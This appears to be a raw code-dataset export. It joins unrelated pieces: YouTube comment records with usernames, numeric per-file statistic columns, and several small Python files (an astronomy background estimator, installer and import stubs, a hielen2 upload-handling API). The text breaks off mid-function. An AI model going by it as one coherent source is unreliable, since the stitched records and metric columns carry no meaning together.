'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxd4wuBKZG4164EE1PQ2XjME6Q5WsuJ_MsfCA=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15211, 'authorDisplayName': 'Sporky0', 'commentDatePosted': datetime.datetime(2015, 10, 24, 22, 40, 8), 'commentID': 25920, 'textDisplay': "Love your videos Matt, always have. But it might just be me but the echo/reverb (whatever it was) on the voice was kinda annoying. 
It overshadowed your vocals and I found it difficult to listen to. \nI'm not trying to shit on you or the video, just sharing my opinion.", 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJxLREJhsl7hGohv5C3S-zQWmDVnqFUOGFLTepE43w=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15171, 'authorDisplayName': 'Meaghan Kalinowski', 'commentDatePosted': datetime.datetime(2015, 12, 1, 0, 54, 18), 'commentID': 25847, 'textDisplay': 'labyrinth', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'My Girl | The Temptations | Matt Mulholland Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwmB3fa5sJSlOT35rkWCVfZn85qwy_qsrY_u3AJ=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15205, 'authorDisplayName': 'Remelox', 'commentDatePosted': datetime.datetime(2015, 10, 28, 21, 44, 58), 'commentID': 25909, 'textDisplay': 'Nice to get this but upset to lose the How Long Can You Dance video.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJyQbxJvL7rI8ulO3sXbDFwNTbio_nveIEFPpJ4nmA=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15208, 'authorDisplayName': 'William Bravo', 'commentDatePosted': datetime.datetime(2015, 10, 26, 5, 2, 36), 'commentID': 25914, 'textDisplay': 'Magnificent.', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJwS6b29q2hYR3LwRXHMJgtnukIDXL-jjBYv2_KF=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15203, 'authorDisplayName': 'farLander', 'commentDatePosted': datetime.datetime(2015, 10, 30, 2, 31, 56), 'commentID': 25907, 'textDisplay': 'Tbone powah!', 'archive': False, 'up_vote': None, 
'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJz142JGiEAJ7aBU42K8fLibtk4sgyDgHL1O5Lv3eQ=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15209, 'authorDisplayName': 'ShakSterTV', 'commentDatePosted': datetime.datetime(2015, 10, 26, 4, 18, 36), 'commentID': 25915, 'textDisplay': 'Amazing job man', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}, {'platformAvatar': 'https://yt3.ggpht.com/a/AATXAJzZmF4kIDwWj79mCi-iUAVzuIiGihXaKKIL4GP-JA=s48-c-k-c0xffffffff-no-rj-mo', 'badge': 'newFan', 'fanID': 15221, 'authorDisplayName': 'Joon Nam', 'commentDatePosted': datetime.datetime(2015, 10, 24, 7, 56, 1), 'commentID': 25942, 'textDisplay': 'first', 'archive': False, 'up_vote': None, 'down_vote': None, 'videoTitle': 'And So It Goes by Billy Joel | Matt Mulholland & Chris Bill Cover'}]
| 2,043.7
| 5,269
| 0.73274
| 2,729
| 20,437
| 5.444119
| 0.144742
| 0.043077
| 0.059231
| 0.072693
| 0.951067
| 0.948442
| 0.940163
| 0.937269
| 0.935451
| 0.935451
| 0
| 0.072921
| 0.102853
| 20,437
| 10
| 5,270
| 2,043.7
| 0.737388
| 0
| 0
| 0
| 0
| 9.8
| 0.716557
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
11d27e1b2e27346fdb81516797d014b964e4badd
| 103
|
py
|
Python
|
triangle_multiplicative_module/__init__.py
|
lucidrains/triangle-multiplicative-module
|
23a739a71ed2e381e660c7756a72408074746d2a
|
[
"MIT"
] | 16
|
2021-07-19T17:54:55.000Z
|
2022-02-18T19:02:23.000Z
|
triangle_multiplicative_module/__init__.py
|
lucidrains/triangle-multiplicative-module
|
23a739a71ed2e381e660c7756a72408074746d2a
|
[
"MIT"
] | 2
|
2021-07-22T03:34:07.000Z
|
2021-08-03T05:18:24.000Z
|
triangle_multiplicative_module/__init__.py
|
lucidrains/triangle-multiplicative-module
|
23a739a71ed2e381e660c7756a72408074746d2a
|
[
"MIT"
] | 1
|
2021-07-23T01:11:15.000Z
|
2021-07-23T01:11:15.000Z
|
from triangle_multiplicative_module.triangle_multiplicative_module import TriangleMultiplicativeModule
| 51.5
| 102
| 0.951456
| 9
| 103
| 10.444444
| 0.666667
| 0.468085
| 0.595745
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038835
| 103
| 1
| 103
| 103
| 0.949495
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
11d63a7525e2e81170955f16175d7636a2fe3eca
| 104
|
py
|
Python
|
emcee_install.py
|
bblais/Python-for-Science
|
abe28ddb5748ef9ecdceda77a01352e21d3a675b
|
[
"MIT"
] | null | null | null |
emcee_install.py
|
bblais/Python-for-Science
|
abe28ddb5748ef9ecdceda77a01352e21d3a675b
|
[
"MIT"
] | null | null | null |
emcee_install.py
|
bblais/Python-for-Science
|
abe28ddb5748ef9ecdceda77a01352e21d3a675b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Install the MCMC example dependencies: emcee and triangle_plot."""
import subprocess
import sys

# Invoke pip as `python -m pip` through the *running* interpreter so the
# packages are installed into the same environment this script was launched
# from.  A bare `pip` found on PATH (as the old os.system call used) may
# belong to a different Python installation entirely.
# check_call also raises on a non-zero exit status instead of silently
# ignoring a failed install.
for package in ("emcee", "triangle_plot"):
    subprocess.check_call([sys.executable, "-m", "pip", "install", package])
| 14.857143
| 38
| 0.740385
| 17
| 104
| 4.470588
| 0.705882
| 0.210526
| 0.289474
| 0.473684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 104
| 6
| 39
| 17.333333
| 0.826087
| 0.192308
| 0
| 0
| 0
| 0
| 0.512195
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
eea2406ad765d1796de9d6f27d8c4437b17ec5cf
| 241
|
py
|
Python
|
danube_delta/plugins/__init__.py
|
honzajavorek/danube-delta
|
da91bf8a9ed4018e4f5e6055b88ce81b32be6dc3
|
[
"MIT"
] | 6
|
2017-04-25T09:15:07.000Z
|
2018-04-26T08:15:30.000Z
|
danube_delta/plugins/__init__.py
|
honzajavorek/danube-delta
|
da91bf8a9ed4018e4f5e6055b88ce81b32be6dc3
|
[
"MIT"
] | 36
|
2016-03-03T07:48:56.000Z
|
2021-06-25T15:18:37.000Z
|
danube_delta/plugins/__init__.py
|
honzajavorek/danube-delta
|
da91bf8a9ed4018e4f5e6055b88ce81b32be6dc3
|
[
"MIT"
] | 4
|
2016-08-26T08:37:46.000Z
|
2018-02-25T06:52:13.000Z
|
from . import (
code_blocks, headings, plain_summary, featured_image, media, tables,
authors, outdated_article,
)
# All plugin modules imported above, collected in one list so callers can
# register them in a single place.
# NOTE(review): keep this list in sync with the `from . import (...)` block
# directly above — both currently enumerate the same eight modules.
PLUGINS = [
    code_blocks, headings, plain_summary, featured_image, media, tables,
    authors, outdated_article
]
| 21.909091
| 72
| 0.73444
| 27
| 241
| 6.259259
| 0.555556
| 0.118343
| 0.213018
| 0.272189
| 0.899408
| 0.899408
| 0.899408
| 0.899408
| 0.899408
| 0.899408
| 0
| 0
| 0.178423
| 241
| 10
| 73
| 24.1
| 0.853535
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
eeb5fa3d13a776296677e062d9e4e6743ddb17ae
| 46
|
py
|
Python
|
Blackjaw120/utils/oold_flag.py
|
Gitr007/CTFChalls
|
ccd4f8ce472e53b5cc518389807264418d008ea6
|
[
"Apache-2.0"
] | 1
|
2019-01-21T21:02:00.000Z
|
2019-01-21T21:02:00.000Z
|
Blackjaw120/utils/oold_flag.py
|
Gitr007/CTFChalls
|
ccd4f8ce472e53b5cc518389807264418d008ea6
|
[
"Apache-2.0"
] | null | null | null |
Blackjaw120/utils/oold_flag.py
|
Gitr007/CTFChalls
|
ccd4f8ce472e53b5cc518389807264418d008ea6
|
[
"Apache-2.0"
] | null | null | null |
import sys
# TODO : add new_flag.py file
| 11.5
| 31
| 0.652174
| 8
| 46
| 3.625
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.282609
| 46
| 3
| 32
| 15.333333
| 0.878788
| 0.586957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0148eecf166abcfed60cf9a2beae4d149333792d
| 3,506
|
py
|
Python
|
est_bkg.py
|
jasminwash/hostgal
|
b87f100b783e50741654daca1fb48acb18a6efbf
|
[
"MIT"
] | null | null | null |
est_bkg.py
|
jasminwash/hostgal
|
b87f100b783e50741654daca1fb48acb18a6efbf
|
[
"MIT"
] | null | null | null |
est_bkg.py
|
jasminwash/hostgal
|
b87f100b783e50741654daca1fb48acb18a6efbf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 15 20:12:52 2018
@author: Dartoon
"""
import numpy as np
from astropy.visualization import SqrtStretch
from astropy.stats import SigmaClip
from photutils import Background2D, SExtractorBackground
from astropy.visualization.mpl_normalize import ImageNormalize
from photutils import make_source_mask
import matplotlib.pyplot as plt
norm = ImageNormalize(stretch=SqrtStretch())
def est_bkg(image, pltshow=1):
    """Estimate the smooth 2D background light of *image*.

    Detected sources (``make_source_mask``) and NaN pixels are masked,
    then a background map is fitted with ``Background2D`` using a
    SExtractor-style estimator on 50x50-pixel boxes.  Three diagnostic
    figures are produced (data, mask, background).

    Parameters
    ----------
    image : 2D array
        Image to estimate the background of.
    pltshow : int, optional
        When 0 the diagnostic figures are created but closed instead of
        shown.  Any other value (default 1) shows them.

    Returns
    -------
    2D array
        The fitted background, zeroed at NaN-pixel positions.
    """
    from matplotlib.colors import LogNorm

    def _diagnostic(panel, **imshow_kwargs):
        # One full-frame diagnostic figure, shown or discarded per pltshow.
        # (Factored out: the original repeated this stanza three times.)
        fig = plt.figure(figsize=(15, 15))
        ax = fig.add_subplot(1, 1, 1)
        ax.imshow(panel, origin='lower', **imshow_kwargs)
        ax.xaxis.set_visible(False)
        ax.yaxis.set_visible(False)
        if pltshow == 0:
            plt.close()
        else:
            plt.show()

    print("Estimating the background light......")
    img = image
    # NOTE(review): `iters=` and `snr=` are older astropy/photutils keyword
    # names (renamed `maxiters=` / `nsigma=` upstream); kept to match the
    # library versions this project pins — confirm before upgrading.
    sigma_clip = SigmaClip(sigma=3., iters=10)
    bkg_estimator = SExtractorBackground()
    mask_0 = make_source_mask(img, snr=2, npixels=5, dilate_size=11)
    mask_1 = np.isnan(img)
    # Boolean masks: `+` acts as elementwise OR here.
    mask = mask_0 + mask_1
    bkg = Background2D(img, (50, 50), filter_size=(3, 3),
                       sigma_clip=sigma_clip, bkg_estimator=bkg_estimator,
                       mask=mask)
    _diagnostic(img, norm=LogNorm())
    _diagnostic(mask)
    # Zero the background wherever the data itself is NaN.
    back = bkg.background * ~mask_1
    _diagnostic(back, cmap='Greys_r')
    return back
def sub_bkg(img, plot=True):
    """Fit the 2D background of *img* and subtract it.

    Same estimation recipe as ``est_bkg`` (source + NaN masking, then a
    ``Background2D`` fit with a SExtractor-style estimator), but returns
    both the subtracted image and the background map.

    Parameters
    ----------
    img : 2D array
        Image to process.
    plot : bool, optional
        When True (default) the three diagnostic figures (data, mask,
        background) are shown; when False they are closed silently.

    Returns
    -------
    tuple of 2D arrays
        ``(img - back, back)`` where ``back`` is the fitted background,
        zeroed at NaN-pixel positions.
    """
    from astropy.stats import SigmaClip
    from photutils import Background2D, SExtractorBackground
    from photutils import make_source_mask
    from matplotlib.colors import LogNorm

    clipper = SigmaClip(sigma=3., iters=10)
    estimator = SExtractorBackground()
    source_mask = make_source_mask(img, snr=2, npixels=5, dilate_size=11)
    nan_mask = np.isnan(img)
    combined_mask = source_mask + nan_mask
    bkg = Background2D(img, (50, 50), filter_size=(3, 3),
                       sigma_clip=clipper, bkg_estimator=estimator,
                       mask=combined_mask)

    def _show(panel, **imshow_kwargs):
        # One full-frame diagnostic figure, shown or discarded per `plot`.
        fig = plt.figure(figsize=(15, 15))
        axis = fig.add_subplot(1, 1, 1)
        axis.imshow(panel, origin='lower', **imshow_kwargs)
        axis.xaxis.set_visible(False)
        axis.yaxis.set_visible(False)
        if plot:
            plt.show()
        else:
            plt.close()

    _show(img, norm=LogNorm())
    _show(combined_mask)
    back = bkg.background * ~nan_mask
    _show(back, cmap='Greys_r')
    return img - back, back
| 32.462963
| 74
| 0.646606
| 490
| 3,506
| 4.5
| 0.226531
| 0.010884
| 0.081633
| 0.051701
| 0.806349
| 0.806349
| 0.776417
| 0.776417
| 0.776417
| 0.776417
| 0
| 0.042522
| 0.221905
| 3,506
| 107
| 75
| 32.766355
| 0.765762
| 0.113805
| 0
| 0.879121
| 0
| 0
| 0.026239
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021978
| false
| 0
| 0.131868
| 0
| 0.175824
| 0.010989
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
014cd938df7acd797b5e1fe7fded15f5616f5467
| 139
|
py
|
Python
|
sb3_contrib/ppo_mask/__init__.py
|
glmcdona/stable-baselines3-contrib
|
91f9b1ed34fbaa9243a044ea67aa4c677663bfc2
|
[
"MIT"
] | null | null | null |
sb3_contrib/ppo_mask/__init__.py
|
glmcdona/stable-baselines3-contrib
|
91f9b1ed34fbaa9243a044ea67aa4c677663bfc2
|
[
"MIT"
] | null | null | null |
sb3_contrib/ppo_mask/__init__.py
|
glmcdona/stable-baselines3-contrib
|
91f9b1ed34fbaa9243a044ea67aa4c677663bfc2
|
[
"MIT"
] | null | null | null |
from sb3_contrib.ppo_mask.policies import CnnPolicy, MlpPolicy # , MultiInputPolicy
from sb3_contrib.ppo_mask.ppo_mask import MaskablePPO
| 46.333333
| 84
| 0.856115
| 19
| 139
| 6
| 0.578947
| 0.184211
| 0.245614
| 0.298246
| 0.368421
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015873
| 0.093525
| 139
| 2
| 85
| 69.5
| 0.888889
| 0.129496
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0169dc5e6ada8a0a13c034f84a918a3a99196f3a
| 178
|
py
|
Python
|
graphvl/db/init_db.py
|
verifid/graph-vl
|
7062e0e0fa7de3e1ce0598cd7c8f0e74e6355e9e
|
[
"MIT"
] | 27
|
2020-04-04T12:08:48.000Z
|
2021-12-28T23:07:19.000Z
|
graphvl/db/init_db.py
|
verifid/graph-vl
|
7062e0e0fa7de3e1ce0598cd7c8f0e74e6355e9e
|
[
"MIT"
] | null | null | null |
graphvl/db/init_db.py
|
verifid/graph-vl
|
7062e0e0fa7de3e1ce0598cd7c8f0e74e6355e9e
|
[
"MIT"
] | 3
|
2021-01-22T19:03:15.000Z
|
2021-07-20T16:11:56.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from graphvl.db.base_class import Base
from graphvl.db.session import engine
def init_db():
    """Create the database schema for every model registered on ``Base``.

    Uses the project-wide ``engine`` (from ``graphvl.db.session``).
    NOTE(review): this looks like SQLAlchemy's declarative ``create_all``,
    which only creates tables that do not already exist — confirm against
    ``graphvl.db.base_class``.
    """
    Base.metadata.create_all(engine)
| 17.8
| 38
| 0.719101
| 28
| 178
| 4.464286
| 0.714286
| 0.176
| 0.208
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006536
| 0.140449
| 178
| 9
| 39
| 19.777778
| 0.810458
| 0.235955
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
016d9d3f72dceea921c160eca82a212ad42275db
| 14,295
|
py
|
Python
|
src/hielen2/api/actions.py
|
fantamodeman/hielen2
|
b1b249f4bd7609b3977777f663ae242adf69cfe2
|
[
"MIT"
] | null | null | null |
src/hielen2/api/actions.py
|
fantamodeman/hielen2
|
b1b249f4bd7609b3977777f663ae242adf69cfe2
|
[
"MIT"
] | null | null | null |
src/hielen2/api/actions.py
|
fantamodeman/hielen2
|
b1b249f4bd7609b3977777f663ae242adf69cfe2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
import hug
import tempfile
import falcon
import os
import time
import json
from hielen2 import db, conf
import hielen2.source as sourceman
from streaming_form_data import StreamingFormDataParser
from streaming_form_data.targets import FileTarget, ValueTarget
from himada.api import ResponseFormatter
from urllib.parse import unquote
from importlib import import_module
from pathlib import Path, PosixPath
import traceback
@hug.get("/{feature}")
def features_actions_values(feature, actions=None, timestamp=None, request=None, response=None):
    """
    **Retrieve the current state of the actions performed on a feature.**

    Returns the requested values according to the action schema.

    Note 1: `actions` accepts multiple comma-separated values.
    Note 2: depending on the requested action, some parameters may be used as
    input but not stored; for those parameters the returned value will be null.

    The response has this shape:

        [
            { "feature"*: ..., "action_name"*: ..., "timestamp": ..., "value": {...} },
            ...
        ]

    Note 3: (*) the "feature" and "action" fields may be omitted from the
    structure when they are unambiguous; "timestamp" and "value" are always
    returned.

    Possible responses:
    - _404 Not Found_: the requested feature is missing or misconfigured.
    """
    out = ResponseFormatter()
    # Resolve the feature source and collect the requested action values;
    # any failure (unknown feature, broken prototype config) maps to 404.
    try:
        source = sourceman.sourceFactory(feature)
        data = source.getActionValues(actions, timestamp)
        out.data = data if isinstance(data, list) else [data]
    except Exception as e:
        traceback.print_exc()
        out.status = falcon.HTTP_NOT_FOUND
        out.message = f"feature '{feature}' does not exists or it is misconfigured: {e}"
    out.format(request=request, response=response)
    return
@hug.get("/{feature}/{action}")
def feature_action_values(feature, action, timestamp=None, request=None, response=None):
    """
    **Retrieve the current state of one specific action of a specific feature.**"""
    # Delegate to the multi-action endpoint with a single action name.
    return features_actions_values(
        feature, action, timestamp, request=request, response=response
    )
@hug.delete("/{feature}/{action}")
def feature_action_delete(feature, action, timestamp, request=None, response=None):
    """
    **Delete a given action of a specific feature.**"""
    out = ResponseFormatter()
    # Resolve the feature source and ask it to drop the action values;
    # any failure (unknown feature, broken config) is reported as 404.
    try:
        source = sourceman.sourceFactory(feature)
        out.data = source.deleteActionValues(action, timestamp)
    except Exception as e:
        traceback.print_exc()
        out.status = falcon.HTTP_NOT_FOUND
        out.message = f"feature '{feature}' does not exists or it is misconfigured: {e}"
    out.format(request=request, response=response)
    return
@hug.post("/{feature}/{action}", parse_body=False)
@hug.default_input_format(content_type="multipart/form-data")
def make_action(feature, action, request=None, response=None):
    """
    **Execute an action.**

    Requests the execution of a specific action on a feature, supplying all
    the required information through a dedicated dynamic form.

    - Besides the `feature` and `action` parameters given in the url, it
      accepts a _multipart/form-data_ payload based on the schema selected by
      those two explicit parameters.
    - The whole content is downloaded through stream chunks ('100 continue')
      to avoid worker timeouts on large payloads.

    Possible responses:
    - _200 OK_: the action succeeded. The requested action is taken in charge
      but may have an arbitrary execution time (it may be split onto another
      process).
    - _400 Bad Request_: required parameters are missing or the action values
      are invalid.
    - _404 Not Found_: the feature does not exist or the requested action is
      not defined for it.
    - _500 Internal Server Error_: the declared prototype module does not
      exist.
    - _501 Not Implemented_: the prototype does not (yet) implement one or all
      of the management modules.

    A minimal management mechanism is implemented: the supplied info is saved
    and can be returned as-is (see the GET method of this api), which allows
    developing modules starting from a template with a default response.
    """
    out = ResponseFormatter()
    # Resolve the feature; a missing or misconfigured feature is a 404.
    try:
        featobj = sourceman.sourceFactory(feature)
    except KeyError as e:
        traceback.print_exc()
        out.status = falcon.HTTP_NOT_FOUND
        out.message = f"feature '{feature}' does not exists or it is misconfigured: {e}"
        out.format(request=request, response=response)
        return
    # Fetch the action schema; distinguish "not implemented" (501) from
    # "prototype module missing" (500).
    try:
        schema = featobj.getActionSchema(action)
    except KeyError:
        traceback.print_exc()
        out.status = falcon.HTTP_NOT_IMPLEMENTED
        out.message = f"Prototype '{featobj.type}' actions not implemented."
        out.format(request=request, response=response)
        return
    except ModuleNotFoundError:
        traceback.print_exc()
        out.status = falcon.HTTP_INTERNAL_SERVER_ERROR
        out.message = f"Prototype '{featobj.type}' module not found."
        out.format(request=request, response=response)
        return
    parser = StreamingFormDataParser(headers=request.headers)
    values = {}
    toremove = []
    # TODO differentiate the input field types
    # Register one streaming target per schema field: "LocalFile" fields are
    # spooled to a temp path (scheduled for cleanup), everything else is kept
    # in memory as a ValueTarget.
    for k, w in schema["fields"].items():
        if w == "LocalFile":
            timenow = time.perf_counter()
            filepath = Path(
                tempfile.gettempdir(), f"{feature}.{k}.{timenow}.part"
            )
            target = FileTarget(filepath)
            parser.register(k, target)
            values[k] = filepath
            toremove.append(filepath)
        else:
            target = ValueTarget()
            parser.register(k, target)
            values[k] = target

    def removetempfiles(toremove):
        # Best-effort removal of the temporary upload files.
        for v in toremove:
            try:
                os.unlink(v)
            except FileNotFoundError:
                pass

    # Drain the request stream in 8 KiB chunks so large uploads do not
    # time out the workers.
    while True:
        chunk = request.stream.read(8192)
        if not chunk:
            break
        parser.data_received(chunk)
    kwargs = {}
    # Normalize the parsed targets into plain keyword arguments.
    for k, w in values.items():
        model = schema["fields"][k]
        if model == "LocalFile":
            v = str(w)
        elif model == "FTPPath":
            # FTP paths are url-decoded and anchored to the configured FTP root.
            v = unquote(w.value.decode("utf8")) or None
            if v is not None:
                v = str(Path(conf['ftproot'], v))
        else:
            v = unquote(w.value.decode("utf8")) or None
        kwargs[k] = v
    # Reject the request if any schema-required parameter is missing.
    m = [m for m in schema["required"] if kwargs[m] is None]
    if m:
        out.status = falcon.HTTP_BAD_REQUEST
        out.message = f"Required parameters {m} not supplied"
        out.format(request=request, response=response)
        removetempfiles(toremove)
        return
    # CHECKS request checks ALL RIGHT. Continuing with code loading.
    # Trying to initialize feature action manager module.
    try:
        result = featobj.execAction(action, **kwargs)
    except AttributeError:
        traceback.print_exc()
        out.status = falcon.HTTP_NOT_IMPLEMENTED
        out.message = f"Action '{action}' not implemented."
        out.format(request=request, response=response)
        removetempfiles(toremove)
        return
    except Exception as e:
        traceback.print_exc()
        out.status = falcon.HTTP_BAD_REQUEST
        out.message = f"Action values error: {e}."
        out.format(request=request, response=response)
        removetempfiles(toremove)
        return
    # Persist the action result keyed by (feature, action, timestamp).
    try:
        db["actions"][feature, action, result['timestamp']] = {"value": result}
        out.format(request=request, response=response)
    except KeyError as e:
        traceback.print_exc()
        out.status = falcon.HTTP_INTERNAL_SERVER_ERROR
        out.message = str(e)
        out.format(request=request, response=response)
    except ValueError as e:
        traceback.print_exc()
        out.status = falcon.HTTP_BAD_REQUEST
        out.message = str(e)
        out.format(request=request, response=response)
    removetempfiles(toremove)
    return
@hug.put("/{feature}/{action}", parse_body=False)
@hug.default_input_format(content_type="multipart/form-data")
def update_action(feature, action, request=None, response=None):
    """
    **Execute (update) an action.**

    Requests the execution of a specific action on a feature, supplying all
    the required information through a dedicated dynamic form.

    - Besides the `feature` and `action` parameters given in the url, it
      accepts a _multipart/form-data_ payload based on the schema selected by
      those two explicit parameters.
    - The whole content is downloaded through stream chunks ('100 continue')
      to avoid worker timeouts on large payloads.

    Possible responses:
    - _200 OK_: the action succeeded. The requested action is taken in charge
      but may have an arbitrary execution time (it may be split onto another
      process).
    - _400 Bad Request_: the action values are invalid.
    - _404 Not Found_: the feature does not exist or the requested action is
      not defined for it.
    - _500 Internal Server Error_: the declared prototype module does not
      exist.
    - _501 Not Implemented_: the prototype does not (yet) implement one or all
      of the management modules.

    A minimal management mechanism is implemented: the supplied info is saved
    and can be returned as-is (see the GET method of this api), which allows
    developing modules starting from a template with a default response.
    """
    out = ResponseFormatter()
    # Trying to manage income feature request and its prototype configuration.
    # A missing or misconfigured feature is reported as 404.
    try:
        featobj = sourceman.sourceFactory(feature)
    except KeyError as e:
        traceback.print_exc()
        out.status = falcon.HTTP_NOT_FOUND
        out.message = f"feature '{feature}' does not exists or it is misconfigured: {e}"
        out.format(request=request, response=response)
        return
    # Fetch the action schema; "not implemented" maps to 501, a missing
    # prototype module to 500.
    try:
        schema=featobj.getActionSchema(action)
    except KeyError as e:
        traceback.print_exc()
        out.status = falcon.HTTP_NOT_IMPLEMENTED
        out.message = f"Prototype '{featobj.type}' actions not implemented."
        out.format(request=request, response=response)
        return
    except ModuleNotFoundError as e:
        traceback.print_exc()
        out.status = falcon.HTTP_INTERNAL_SERVER_ERROR
        out.message = f"Prototype '{featobj.type}' module not found."
        out.format(request=request, response=response)
        return
    parser = StreamingFormDataParser(headers=request.headers)
    values = {}
    toremove = []
    # TODO differentiate the input field types
    # Register one streaming target per schema field: "LocalFile" fields are
    # spooled to a temp path (scheduled for cleanup), everything else is kept
    # in memory as a ValueTarget.
    for k, w in schema["fields"].items():
        if w == "LocalFile":
            timenow = time.perf_counter()
            filepath = Path(
                tempfile.gettempdir(), f"{feature}.{k}.{timenow}.part"
            )
            target = FileTarget(filepath)
            parser.register(k, target)
            values[k] = filepath
            toremove.append(filepath)
        else:
            target = ValueTarget()
            parser.register(k, target)
            values[k] = target
    def removetempfiles(toremove):
        # Best-effort removal of the temporary upload files.
        for v in toremove:
            try:
                os.unlink(v)
            except FileNotFoundError as e:
                pass
    # Drain the request stream in 8 KiB chunks so large uploads do not
    # time out the workers.
    while True:
        chunk = request.stream.read(8192)
        if not chunk:
            break
        parser.data_received(chunk)
    kwargs = {}
    # Normalize the parsed targets into plain keyword arguments.
    for k, w in values.items():
        model = schema["fields"][k]
        if model == "LocalFile":
            #v = os.path.exists(w) and str(w) or None
            v = str(w)
        elif model == "FTPPath":
            # FTP paths are url-decoded and anchored to the configured FTP root.
            v = unquote(w.value.decode("utf8")) or None
            if v is not None:
                v=str(Path(conf['ftproot'],v))
        else:
